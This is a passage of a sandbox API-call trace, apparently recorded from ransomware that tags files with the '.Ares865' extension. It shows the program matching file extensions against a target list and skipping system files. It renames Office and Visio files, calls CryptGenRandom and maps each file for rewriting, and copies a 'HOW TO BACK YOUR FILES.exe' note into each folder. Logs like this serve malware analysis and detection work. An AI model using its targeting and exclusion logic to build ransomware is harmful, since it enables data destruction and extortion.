lstrlenW (lpString="mdf") returned 3 [0067.138] lstrcmpiW (lpString1="VST", lpString2="mdf") returned 1 [0067.138] lstrlenW (lpString="mdb") returned 3 [0067.138] lstrcmpiW (lpString1="VST", lpString2="mdb") returned 1 [0067.138] lstrlenW (lpString="sql") returned 3 [0067.138] lstrcmpiW (lpString1="VST", lpString2="sql") returned 1 [0067.138] lstrlenW (lpString="sqlite") returned 6 [0067.138] lstrcmpiW (lpString1="_U.VST", lpString2="sqlite") returned -1 [0067.138] lstrlenW (lpString="sqlite3") returned 7 [0067.138] lstrcmpiW (lpString1="R_U.VST", lpString2="sqlite3") returned -1 [0067.138] lstrlenW (lpString="sqlitedb") returned 8 [0067.138] lstrcmpiW (lpString1="IR_U.VST", lpString2="sqlitedb") returned -1 [0067.138] lstrlenW (lpString="xml") returned 3 [0067.138] lstrcmpiW (lpString1="VST", lpString2="xml") returned -1 [0067.138] lstrlenW (lpString="$er") returned 3 [0067.138] lstrcmpiW (lpString1="VST", lpString2="$er") returned 1 [0067.138] lstrlenW (lpString="4dd") returned 3 [0067.138] lstrcmpiW (lpString1="VST", lpString2="4dd") returned 1 [0067.138] lstrlenW (lpString="4dl") returned 3 [0067.138] lstrcmpiW (lpString1="VST", lpString2="4dl") returned 1 [0067.138] lstrlenW (lpString="^^^") returned 3 [0067.138] lstrcmpiW (lpString1="VST", lpString2="^^^") returned 1 [0067.138] lstrlenW (lpString="abs") returned 3 [0067.138] lstrcmpiW (lpString1="VST", lpString2="abs") returned 1 [0067.138] lstrlenW (lpString="abx") returned 3 [0067.138] lstrcmpiW (lpString1="VST", lpString2="abx") returned 1 [0067.138] lstrlenW (lpString="accdb") returned 5 [0067.139] lstrcmpiW (lpString1="U.VST", lpString2="accdb") returned 1 [0067.139] lstrlenW (lpString="accdc") returned 5 [0067.139] lstrcmpiW (lpString1="U.VST", lpString2="accdc") returned 1 [0067.139] lstrlenW (lpString="accde") returned 5 [0067.139] lstrcmpiW (lpString1="U.VST", lpString2="accde") returned 1 [0067.139] lstrlenW (lpString="accdr") returned 5 [0067.139] lstrcmpiW (lpString1="U.VST", lpString2="accdr") returned 1 [0067.139] lstrlenW (lpString="accdt") returned 5 [0067.139] lstrcmpiW (lpString1="U.VST", lpString2="accdt") returned 1 [0067.139] lstrlenW (lpString="accdw") returned 5 [0067.139] lstrcmpiW (lpString1="U.VST", lpString2="accdw") returned 1 [0067.139] lstrlenW (lpString="accft") returned 5 [0067.139] lstrcmpiW (lpString1="U.VST", lpString2="accft") returned 1 [0067.139] lstrlenW (lpString="adb") returned 3 [0067.139] lstrcmpiW (lpString1="VST", lpString2="adb") returned 1 [0067.139] lstrlenW (lpString="adb") returned 3 [0067.139] lstrcmpiW (lpString1="VST", lpString2="adb") returned 1 [0067.139] lstrlenW (lpString="ade") returned 3 [0067.139] lstrcmpiW (lpString1="VST", lpString2="ade") returned 1 [0067.139] lstrlenW (lpString="adf") returned 3 [0067.139] lstrcmpiW (lpString1="VST", lpString2="adf") returned 1 [0067.139] lstrlenW (lpString="adn") returned 3 [0067.139] lstrcmpiW (lpString1="VST", lpString2="adn") returned 1 [0067.139] lstrlenW (lpString="adp") returned 3 [0067.139] lstrcmpiW (lpString1="VST", lpString2="adp") returned 1 [0067.139] lstrlenW (lpString="alf") returned 3 [0067.139] lstrcmpiW (lpString1="VST", lpString2="alf") returned 1 [0067.139] lstrlenW (lpString="ask") returned 3 [0067.139] lstrcmpiW (lpString1="VST", lpString2="ask") returned 1 [0067.139] lstrlenW (lpString="btr") returned 3 [0067.139] lstrcmpiW (lpString1="VST", lpString2="btr") returned 1 [0067.139] lstrlenW (lpString="cat") returned 3 [0067.139] lstrcmpiW (lpString1="VST", lpString2="cat") returned 1 [0067.139] lstrlenW (lpString="cdb") returned 3 [0067.139] lstrcmpiW (lpString1="VST", lpString2="cdb") returned 1 [0067.139] lstrlenW (lpString="ckp") returned 3 [0067.139] lstrcmpiW (lpString1="VST", lpString2="ckp") returned 1 [0067.140] lstrlenW (lpString="cma") returned 3 [0067.140] lstrcmpiW (lpString1="VST", lpString2="cma") returned 1 [0067.140] lstrlenW (lpString="cpd") returned 3 [0067.140] lstrcmpiW (lpString1="VST", lpString2="cpd") returned 1 [0067.140] lstrlenW (lpString="dacpac") returned 6 [0067.140] lstrcmpiW (lpString1="_U.VST", lpString2="dacpac") returned -1 [0067.140] lstrlenW (lpString="dad") returned 3 [0067.140] lstrcmpiW (lpString1="VST", lpString2="dad") returned 1 [0067.140] lstrlenW (lpString="dadiagrams") returned 10 [0067.140] lstrcmpiW (lpString1="TDIR_U.VST", lpString2="dadiagrams") returned 1 [0067.140] lstrlenW (lpString="daschema") returned 8 [0067.140] lstrcmpiW (lpString1="IR_U.VST", lpString2="daschema") returned 1 [0067.140] lstrlenW (lpString="db-journal") returned 10 [0067.140] lstrcmpiW (lpString1="TDIR_U.VST", lpString2="db-journal") returned 1 [0067.140] lstrlenW (lpString="db-shm") returned 6 [0067.140] lstrcmpiW (lpString1="_U.VST", lpString2="db-shm") returned -1 [0067.140] lstrlenW (lpString="db-wal") returned 6 [0067.140] lstrcmpiW (lpString1="_U.VST", lpString2="db-wal") returned -1 [0067.140] lstrlenW (lpString="dbc") returned 3 [0067.140] lstrcmpiW (lpString1="VST", lpString2="dbc") returned 1 [0067.140] lstrlenW (lpString="dbs") returned 3 [0067.140] lstrcmpiW (lpString1="VST", lpString2="dbs") returned 1 [0067.140] lstrlenW (lpString="dbt") returned 3 [0067.140] lstrcmpiW (lpString1="VST", lpString2="dbt") returned 1 [0067.140] lstrlenW (lpString="dbv") returned 3 [0067.140] lstrcmpiW (lpString1="VST", lpString2="dbv") returned 1 [0067.140] lstrlenW (lpString="dbx") returned 3 [0067.140] lstrcmpiW (lpString1="VST", lpString2="dbx") returned 1 [0067.140] lstrlenW (lpString="dcb") returned 3 [0067.140] lstrcmpiW (lpString1="VST", lpString2="dcb") returned 1 [0067.140] lstrcmpiW (lpString1="VST", lpString2="dct") returned 1 [0067.143] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\BRAINSTM.XML.Ares865") returned 82 [0067.143] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\BRAINSTM.XML" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\brainstm.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\BRAINSTM.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\brainstm.xml.ares865"), dwFlags=0x1) returned 1 [0067.144] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\BRAINSTM.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\brainstm.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0067.144] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=1369) returned 1 [0067.144] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0067.145] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0067.145] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0067.145] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0067.145] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0067.145] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.146] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x860, lpName=0x0) returned 0x154 [0067.147] MapViewOfFile (hFileMappingObject=0x154, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x860) returned 0x190000 [0067.148] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0067.148] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0067.148] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.148] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0067.148] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0067.148] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0067.149] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0067.149] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0067.149] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0067.149] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9710 [0067.149] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0067.149] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9710 | out: hHeap=0x2b0000) returned 1 [0067.149] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0067.149] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0067.149] CloseHandle (hObject=0x154) returned 1 [0067.149] CloseHandle (hObject=0x15c) returned 1 [0067.149] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0067.149] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0067.149] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0067.149] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41b31600, ftCreationTime.dwHighDateTime=0x1ca4728, ftLastAccessTime.dwLowDateTime=0x506a3720, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x41b31600, ftLastWriteTime.dwHighDateTime=0x1ca4728, nFileSizeHigh=0x0, nFileSizeLow=0x8800, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BSTORM_M.VSS", cAlternateFileName="")) returned 1 [0067.149] lstrcmpiW (lpString1="BSTORM_M.VSS", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0067.149] lstrcmpiW (lpString1="BSTORM_M.VSS", lpString2="aoldtz.exe") returned 1 [0067.149] lstrcmpiW (lpString1="BSTORM_M.VSS", lpString2=".") returned 1 [0067.149] lstrcmpiW (lpString1="BSTORM_M.VSS", lpString2="..") returned 1 [0067.149] lstrcmpiW (lpString1="BSTORM_M.VSS", lpString2="windows") returned -1 [0067.150] lstrcmpiW (lpString1="BSTORM_M.VSS", lpString2="bootmgr") returned 1 [0067.150] lstrcmpiW (lpString1="BSTORM_M.VSS", lpString2="temp") returned -1 [0067.150] lstrcmpiW (lpString1="BSTORM_M.VSS", lpString2="pagefile.sys") returned -1 [0067.150] lstrcmpiW (lpString1="BSTORM_M.VSS", lpString2="boot") returned 1 [0067.150] lstrcmpiW (lpString1="BSTORM_M.VSS", lpString2="ids.txt") returned -1 [0067.150] lstrcmpiW (lpString1="BSTORM_M.VSS", lpString2="ntuser.dat") returned -1 [0067.150] lstrcmpiW (lpString1="BSTORM_M.VSS", lpString2="perflogs") returned -1 [0067.150] lstrcmpiW (lpString1="BSTORM_M.VSS", lpString2="MSBuild") returned -1 [0067.150] lstrlenW (lpString="BSTORM_M.VSS") returned 12 [0067.150] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\BRAINSTM.XML") returned 74 [0067.150] lstrcpyW (in: lpString1=0x2e2e8dc, lpString2="BSTORM_M.VSS" | out: lpString1="BSTORM_M.VSS") returned="BSTORM_M.VSS" [0067.150] lstrlenW (lpString="BSTORM_M.VSS") returned 12 [0067.150] lstrlenW (lpString="Ares865") returned 7 [0067.150] lstrcmpiW (lpString1="M_M.VSS", lpString2="Ares865") returned 1 [0067.150] lstrlenW (lpString=".dll") returned 4 [0067.150] lstrcmpiW (lpString1="BSTORM_M.VSS", lpString2=".dll") returned 1 [0067.150] lstrlenW (lpString=".lnk") returned 4 [0067.150] lstrcmpiW (lpString1="BSTORM_M.VSS", lpString2=".lnk") returned 1 [0067.150] lstrlenW (lpString=".ini") returned 4 [0067.150] lstrcmpiW (lpString1="BSTORM_M.VSS", lpString2=".ini") returned 1 [0067.150] lstrlenW (lpString=".sys") returned 4 [0067.150] lstrcmpiW (lpString1="BSTORM_M.VSS", lpString2=".sys") returned 1 [0067.150] lstrlenW (lpString="BSTORM_M.VSS") returned 12 [0067.169] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\STARTUP", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\STARTUP") returned="C:\\Program Files\\Microsoft Office\\Office14\\STARTUP" [0067.169] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4d30 | out: hHeap=0x2b0000) returned 1 [0067.170] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d25c0 | out: hHeap=0x2b0000) returned 1 [0067.170] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\STARTUP") returned 50 [0067.170] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\STARTUP" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\STARTUP") returned="C:\\Program Files\\Microsoft Office\\Office14\\STARTUP" [0067.170] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0067.170] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\STARTUP\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\startup\\how to back your files.exe"), bFailIfExists=1) returned 1 [0067.173] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0067.173] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\STARTUP\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e7acd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x598b9400, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x598b9400, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0067.173] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0067.173] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0067.173] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0067.174] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e7acd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x598b9400, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x598b9400, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0067.174] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0067.174] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0067.174] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0067.174] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0067.174] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x598b9400, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x598b9400, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0067.174] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0067.174] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x598b9400, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x598b9400, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0067.174] FindClose (in: hFindFile=0x2cd0e8 | out: hFindFile=0x2cd0e8) returned 1 [0067.174] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d2528 [0067.174] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\SAMPLES", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\SAMPLES") returned="C:\\Program Files\\Microsoft Office\\Office14\\SAMPLES" [0067.174] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4be0 | out: hHeap=0x2b0000) returned 1 [0067.174] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2520 | out: hHeap=0x2b0000) returned 1 [0067.174] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\SAMPLES") returned 50 [0067.174] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\SAMPLES" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\SAMPLES") returned="C:\\Program Files\\Microsoft Office\\Office14\\SAMPLES" [0067.174] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0067.174] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\SAMPLES\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\samples\\how to back your files.exe"), bFailIfExists=1) returned 1 [0067.191] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0067.191] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\SAMPLES\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa671530, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x598df560, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x598df560, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0067.191] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0067.191] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0067.191] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0067.191] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa671530, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x598df560, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x598df560, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0067.191] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0067.191] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0067.191] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0067.191] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0067.191] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x598df560, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x598df560, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0067.191] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0067.192] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc114b600, ftCreationTime.dwHighDateTime=0x1c307de, ftLastAccessTime.dwLowDateTime=0xfa671530, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xc114b600, ftLastWriteTime.dwHighDateTime=0x1c307de, nFileSizeHigh=0x0, nFileSizeLow=0x1d000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SOLVSAMP.XLS", cAlternateFileName="")) returned 1 [0067.192] lstrcmpiW (lpString1="SOLVSAMP.XLS", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0067.192] lstrcmpiW (lpString1="SOLVSAMP.XLS", lpString2="aoldtz.exe") returned 1 [0067.192] lstrcmpiW (lpString1="SOLVSAMP.XLS", lpString2=".") returned 1 [0067.192] lstrcmpiW (lpString1="SOLVSAMP.XLS", lpString2="..") returned 1 [0067.192] lstrcmpiW (lpString1="SOLVSAMP.XLS", lpString2="windows") returned -1 [0067.192] lstrcmpiW (lpString1="SOLVSAMP.XLS", lpString2="bootmgr") returned 1 [0067.192] lstrcmpiW (lpString1="SOLVSAMP.XLS", lpString2="temp") returned -1 [0067.192] lstrcmpiW (lpString1="SOLVSAMP.XLS", lpString2="pagefile.sys") returned 1 [0067.192] lstrcmpiW (lpString1="SOLVSAMP.XLS", lpString2="boot") returned 1 [0067.192] lstrcmpiW (lpString1="SOLVSAMP.XLS", lpString2="ids.txt") returned 1 [0067.192] lstrcmpiW (lpString1="SOLVSAMP.XLS", lpString2="ntuser.dat") returned 1 [0067.192] lstrcmpiW (lpString1="SOLVSAMP.XLS", lpString2="perflogs") returned 1 [0067.192] lstrcmpiW (lpString1="SOLVSAMP.XLS", lpString2="MSBuild") returned 1 [0067.192] lstrlenW (lpString="SOLVSAMP.XLS") returned 12 [0067.192] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\SAMPLES\\*") returned 52 [0067.192] lstrcpyW (in: lpString1=0x2e2e8c6, lpString2="SOLVSAMP.XLS" | out: lpString1="SOLVSAMP.XLS") returned="SOLVSAMP.XLS" [0067.192] lstrlenW (lpString="SOLVSAMP.XLS") returned 12 [0067.192] lstrlenW (lpString="Ares865") returned 7 [0067.192] lstrcmpiW (lpString1="AMP.XLS", lpString2="Ares865") returned -1 [0067.192] lstrlenW (lpString=".dll") returned 4 [0067.192] lstrcmpiW (lpString1="SOLVSAMP.XLS", lpString2=".dll") returned 1 [0067.192] lstrlenW (lpString=".lnk") returned 4 [0067.192] lstrcmpiW (lpString1="SOLVSAMP.XLS", lpString2=".lnk") returned 1 [0067.192] lstrlenW (lpString=".ini") returned 4 [0067.192] lstrcmpiW (lpString1="SOLVSAMP.XLS", lpString2=".ini") returned 1 [0067.192] lstrlenW (lpString=".sys") returned 4 [0067.192] lstrcmpiW (lpString1="SOLVSAMP.XLS", lpString2=".sys") returned 1 [0067.192] lstrlenW (lpString="SOLVSAMP.XLS") returned 12 [0067.193] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\QUERIES", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\QUERIES") returned="C:\\Program Files\\Microsoft Office\\Office14\\QUERIES" [0067.193] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4b70 | out: hHeap=0x2b0000) returned 1 [0067.193] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2260 | out: hHeap=0x2b0000) returned 1 [0067.193] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\QUERIES") returned 50 [0067.193] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\QUERIES" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\QUERIES") returned="C:\\Program Files\\Microsoft Office\\Office14\\QUERIES" [0067.193] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0067.193] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\QUERIES\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\queries\\how to back your files.exe"), bFailIfExists=1) returned 1 [0067.201] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0067.201] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\QUERIES\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa5ff110, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x598df560, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x598df560, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0067.201] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0067.201] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0067.201] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0067.201] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa5ff110, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x598df560, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x598df560, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0067.201] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0067.201] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0067.201] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0067.201] lstrcmpiW (lpString1="..", lpString2="..") returned 